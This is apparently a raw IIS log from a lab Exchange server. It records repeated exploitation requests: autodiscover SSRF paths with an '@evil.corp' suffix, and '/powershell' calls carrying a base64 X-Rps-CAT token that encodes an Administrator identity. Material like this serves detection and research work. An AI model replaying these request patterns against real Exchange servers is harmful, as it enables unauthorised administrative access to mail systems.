2022-10-03 17:58:25 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=c8100367-29ed-4998-be35-97e4dcb0b738; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 996 1788 270 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:25 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=985523e1-c41a-49eb-aa80-b15405b78ef5; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 2384 2125 433 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:24 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=15543472-11d4-417d-a311-0ad37534cce2; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1073 5428 312 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:24 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=7912bab9-ebb2-4e1c-9be0-22f4f02c0f4f; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1190 2076 292 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:24 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=048b53d3-450d-45da-996d-f7e87a59fa0b; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1997 2076 285 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:24 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=500d489e-80ae-4d51-98c3-c6b6a1de1e27; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1220 2076 731 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:23 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=db8226f5-3bb2-415a-b1c8-98955858f253; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1371 3451 305 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:19 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=42f770b4-e32e-4cbe-8222-b5527cfbe8a0; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 996 1788 285 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:19 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=c28df79a-c98a-4dc5-8e6d-d174916200e9; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1301 2125 468 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:19 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=5fd2207c-68a1-4231-a359-2e7ddcb19dff; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1076 5240 248 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:18 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=d614792b-cd4d-4ab6-84b4-e9c2f6426591; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1218 2076 869 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:18 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=cae6c8c4-ee18-4b1b-9bd4-614a52a70361; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1192 2076 289 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:18 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=8b09fd0e-3b8c-46b6-9018-2b4fdc28ad49; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1997 2076 262 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:17 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=56d0739f-a2df-4ea9-8554-f637fe34b2cb; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1373 3451 283 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:14 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=d278422d-db0a-45d2-8f5e-34ab9e38dad3; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 994 1788 307 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:14 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=0265d9f4-da16-480a-b3bf-a5f6fd8e77b6; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 3039 2125 249 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:13 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=62910f50-639b-4c21-a59a-1d4405abb6b0; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1075 5232 356 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:13 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=7745e65c-671a-44d2-a7f6-b96d807f0285; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1190 2076 260 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:13 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=05446596-2eba-41f8-91c8-bda2d35d10d1; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1997 2076 311 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:12 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=0a455ddc-1d02-44dd-a30e-cd959a3f5f9a; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1221 2076 751 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:12 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=b4bb83a3-edfd-41c0-8ef2-9752b5a22a87; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1372 3451 590 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:58:11 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=69dd4e26-a063-4093-b35c-a2d71a3b0fc6; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 1517 2324 396 - text/xml on 2022-10-03 17:58:08 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=9268e401-27f3-4943-9f28-5372cd469ac8; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=77dd4bf3fa444547abe0e69d2a979499 - 100.21.120.14 200 0 0 2013 797 250 - text/xml on 2022-10-03 17:58:08 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/EWS/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=93b802bb-b846-4b87-a654-32fae7b63129; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 - - 100.21.120.14 200 0 0 1681 823 269 - text/xml on 2022-10-03 17:45:20 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=bb4bc7ac-211b-47b4-bc23-383acced95cc; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 995 1788 288 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:20 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=65ec0a96-a11b-408b-b303-a0b58c1941d2; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 2395 2125 330 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:18 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=c64e2aef-c67d-419e-842d-8edf57fe36b6; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1079 5428 283 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:18 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=cbadbb20-c751-4ef9-9fa4-6e7975d7af22; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1190 2076 249 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:18 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=2f2a7f2e-fce6-4541-a683-b080064f23e1; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1999 2076 265 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:17 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=fda37597-33e2-44f7-9ca2-18a2601d4837; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1217 2076 743 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:17 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=23b94023-e5ad-4e17-b5b6-690221456501; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1373 3451 239 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:14 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=a117a424-62c2-4cd9-b950-6b4b41876e82; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 993 1788 276 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:13 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=fa0b3506-7672-4122-9ca2-1d81d9274df6; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1304 2125 766 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:13 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=dade7175-72bf-47c0-91b4-547e8f86cd45; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1075 5240 399 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:12 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=24e2eae4-acbb-4d47-ba4e-6ecc1ff75e50; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1191 2076 266 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:12 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=1d91c289-c6d3-4df7-82f9-89a94b8fc8d5; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1998 2076 350 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:12 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=8b58d2e6-b66e-464b-b76a-1a9769abd9ea; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1216 2076 738 - 